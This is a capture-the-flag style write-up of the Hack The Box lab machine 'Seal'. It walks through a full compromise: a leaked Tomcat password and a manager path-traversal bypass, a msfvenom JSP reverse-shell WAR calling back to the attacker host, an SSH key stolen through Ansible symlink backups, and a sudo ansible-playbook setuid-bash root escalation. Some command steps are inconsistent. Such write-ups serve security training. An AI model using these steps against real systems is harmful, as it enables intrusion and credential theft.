Seal - Medium

Introduction@Seal:~$

Name

Seal

10.10.10.250

Points

Linux

Difficulty

Medium

Creator

MrR3boot

Release Date

10 Jul 2021

Enumeration

Nmap

# Nmap 7.92 scan initiated Wed Oct 27 09:33:23 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.250
Nmap scan report for 10.10.10.250
Host is up (0.37s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Wed, 27 Oct 2021 03:19:57 GMT
|     Set-Cookie: JSESSIONID=node01aiutmvv74gll1prgu45s7tdd8120.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Wed, 27 Oct 2021 03:19:54 GMT
|     Set-Cookie: JSESSIONID=node01w0gr5l9q19tsvaapg6q7llhw118.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Wed, 27 Oct 2021 03:19:55 GMT
|     Set-Cookie: JSESSIONID=node0l0is0847ybn11owkdijko6ryq119.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=10/27%Time=6178C195%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,F6,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Wed,\x2027\x
SF:20Oct\x202021\x2003:19:54\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node01w0g
SF:r5l9q19tsvaapg6q7llhw118\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20
SF:Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/h
SF:tml;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,10A,"
SF:HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2027\x20Oct\x202021\x2003:19:5
SF:5\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node0l0is0847ybn11owkdijko6ryq119
SF:\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x20197
SF:0\x2000:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nAll
SF:ow:\x20GET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRe
SF:quest,AD,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x20te
SF:xt/html;charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\x20c
SF:lose\r\n\r\n<h1>Bad\x20Message\x20505</h1><pre>reason:\x20Unknown\x20Ve
SF:rsion</pre>")%r(FourOhFourRequest,F7,"HTTP/1\.1\x20401\x20Unauthorized\
SF:r\nDate:\x20Wed,\x2027\x20Oct\x202021\x2003:19:57\x20GMT\r\nSet-Cookie:
SF:\x20JSESSIONID=node01aiutmvv74gll1prgu45s7tdd8120\.node0;\x20Path=/;\x2
SF:0HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r
SF:\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\
SF:r\n")%r(Socks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5
SF:\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2
SF:069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>r
SF:eason:\x20Illegal\x20character\x20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1\
SF:.1\x20400\x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/
SF:html;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20clos
SF:e\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20chara
SF:cter\x20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20
SF:character\x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-
SF:1\r\nContent-Length:\x2071\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Me
SF:ssage\x20400</h1><pre>reason:\x20Illegal\x20character\x20OTEXT=0x80</pr
SF:e>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 27 09:34:37 2021 -- 1 IP address (1 host up) scanned in 73.74 seconds

Web

We can see DNS name seal.htb on 443 which is HTTPS . Put it in your /etc/hosts

echo 10.10.10.250 seal.htb | sudo tee -a /etc/hosts

Search function is doesn't work, Found a possible username Jomono , The administrator email is admin@seal.htb .

Directory Scan

┌─[sheinn101@parrot]─[~/htb/seal]
└──╼ [??]$ sudo dirsearch -u https://seal.htb 

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10903

Output File: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/reports/seal.htb/_21-11-15_09-24-49.txt

Error Log: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/logs/errors-21-11-15_09-24-49.log

Target: https://seal.htb/

[09:24:51] Starting: 
[09:24:55] 302 -    0B  - /js  ->  http://seal.htb/js/
[09:25:22] 400 -  804B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[09:25:24] 400 -  804B  - /a%5c.aspx
[09:25:27] 302 -    0B  - /admin  ->  http://seal.htb/admin/
[09:26:00] 302 -    0B  - /css  ->  http://seal.htb/css/
[09:26:13] 403 -  564B  - /host-manager/html
[09:26:13] 302 -    0B  - /host-manager/  ->  http://seal.htb/host-manager/html
[09:26:14] 302 -    0B  - /icon  ->  http://seal.htb/icon/
[09:26:14] 302 -    0B  - /images  ->  http://seal.htb/images/
[09:26:16] 200 -   19KB - /index.html
[09:26:24] 302 -    0B  - /manager  ->  http://seal.htb/manager/
[09:26:24] 302 -    0B  - /manager/  ->  http://seal.htb/manager/html
[09:26:24] 403 -  564B  - /manager/html
[09:26:24] 403 -  564B  - /manager/html/
[09:26:25] 401 -    2KB - /manager/status/all

Task Completed
<dirsearch.dirsearch.Program object at 0x7fea8e95e0d0>

Found /admin folder but it gave us 404 not found.In /manager/status , we get authentication for tomcat but we don't have credentials.Default credentials also didn't work.

Port 8080

Tried to put some credentials like admin:admin but it doesn't work.Let's create an account.

When we login with that account. we can see updated tomcat configuration

In that commit , we can see username and password for tomcat.

  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>
</tomcat-users>

Now we got tomcat credentials.

Go to https://seal.htb/manager/status and you can login with that credential.

After wasting in google to exploit this, I found this on rapid7 .

You can bypass with path traversal to access html like this.

https://seal.htb/manager/status/..;/html

Now we can upload a war file to get reverse shell.

┌─[sheinn101@parrot]─[~/htb/seal]
└──╼ [??]$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.21 LPORT=9001 -f war -o rev_shell.war
Payload size: 1104 bytes
Final size of war file: 1104 bytes
Saved as: rev_shell.war

When we upload we need to intercept the traffic because to add ..; .Otherwise we can't access the html.

Getting User

When you finished file uploading, you can see rev_shell like this.

Listen with netcat and click on it. you will get reverse shell as tomcat user.

┌─[sheinn101@parrot]─[~/htb/seal]
└──╼ [??]$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.250] 58760
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@seal:/var/lib/tomcat9$

After pspy running, we can see /opt/backups/playbook/run.yml file running as luis.

cat /opt/backups/playbook/run.yml
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/
tomcat@seal:/var/lib/tomcat9$

A simple script that copies files from src folder to dest folder. When I seach in google about “copy_links=yes” , it doing symlinks for us. So we can simply link that to anywhere within the backup path to get it copied in to the backup.

First we need to create a symlink to the id_rsa of Luis and we have writeable in /uploads folder.

find . -writable -file

ln -s /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

Now go to /opt/backups/archives and copy .gz file to /tmp directory.

tomcat@seal:/opt/backups/archives$ ls -lsa
596 -rw-rw-r-- 1 luis luis 609578 Oct 10 21:21 backup-2021-10-10-21:21:33.gz

tomcat@seal:/opt/backups/archives$ cp backup-2021-10-10-21:21:33.gz sheinn.gz

tomcat@seal:/dev/shm$ gzip -kd pencer.gz 

tomcat@seal:/dev/shm$ file pencer
pencer: POSIX tar archive

tomcat@seal:/dev/shm$ tar xvf pencer
dashboard/
dashboard/scripts/
dashboard/images/
dashboard/css/
dashboard/uploads/

Now go to dashboard/uploads directory.

tomcat@seal:/dev/shm$ cd dashboard/uploads/.ssh
tomcat@seal:/dev/shm/dashboard/uploads/.ssh$ ls -lsa
4 -rw-r----- 1 tomcat tomcat  563 May  7 06:10 authorized_keys
4 -rw------- 1 tomcat tomcat 2590 May  7 06:10 id_rsa
4 -rw-r----- 1 tomcat tomcat  563 May  7 06:10 id_rsa.pub

tomcat@seal:/dev/shm/dashboard/uploads/.ssh$ cat id_rsa

id_rsa

Save as file and give it the right permission.

chmod 600 id_rsa

┌─[sheinn101@parrot]─[~/htb/seal]
└──╼ [??]$ ssh -i id_rsa luis@10.10.10.250
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 15 Nov 2021 04:37:58 AM UTC

  System load:  0.0               Processes:             168
  Usage of /:   46.8% of 9.58GB   Users logged in:       0
  Memory usage: 21%               IPv4 address for eth0: 10.10.10.250
  Swap usage:   0%


22 updates can be applied immediately.
15 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri May  7 07:00:18 2021 from 10.10.14.2
luis@seal:~$ cat user.txt
6dc0d38826*********8ecb82b49a
luis@seal:~$

Privilege Escalation

luis@seal:~$ sudo -l
Matching Defaults entries for luis on seal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User luis may run the following commands on seal:
    (ALL) NOPASSWD: /usr/bin/ansible-playbook *
luis@seal:~$

After reading this article , I found a way to get command execution.

Create a file with .yml extension.

luis@seal:/tmp$ cat pwned.yml 
  - name: task
    hosts: localhost
    tasks:
      - name: Getting Shell
        command: "chmod +s /bin/bash"
luis@seal:/tmp$

And then execute like this.

luis@seal:/tmp$ sudo ansible-playbook pwned.yml 
[WARNING]: provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match 'all'

PLAY [task] **********************************************************************************************************************************************************

TASK [Gathering Facts] ***********************************************************************************************************************************************
ok: [localhost]

TASK [Getting Shell] *************************************************************************************************************************************************
[WARNING]: Consider using the file module with mode rather than running 'chmod'.  If you need to use command because file is insufficient you can add 'warn: false'
to this command task or set 'command_warnings=False' in ansible.cfg to get rid of this message.
changed: [localhost]

PLAY RECAP ***********************************************************************************************************************************************************
localhost                  : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

luis@seal:/tmp$ /bin/bash -p
bash-5.0# id
uid=1000(luis) gid=1000(luis) euid=0(root) egid=0(root) groups=0(root),1000(luis)
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
2999febbaf********ed74c30b77438
bash-5.0#

Now we pwned it.

Author Account : https://app.hackthebox.com/profile/237587

PreviousNetmon - Easy NextIntelligence - Medium

Last updated 4 years ago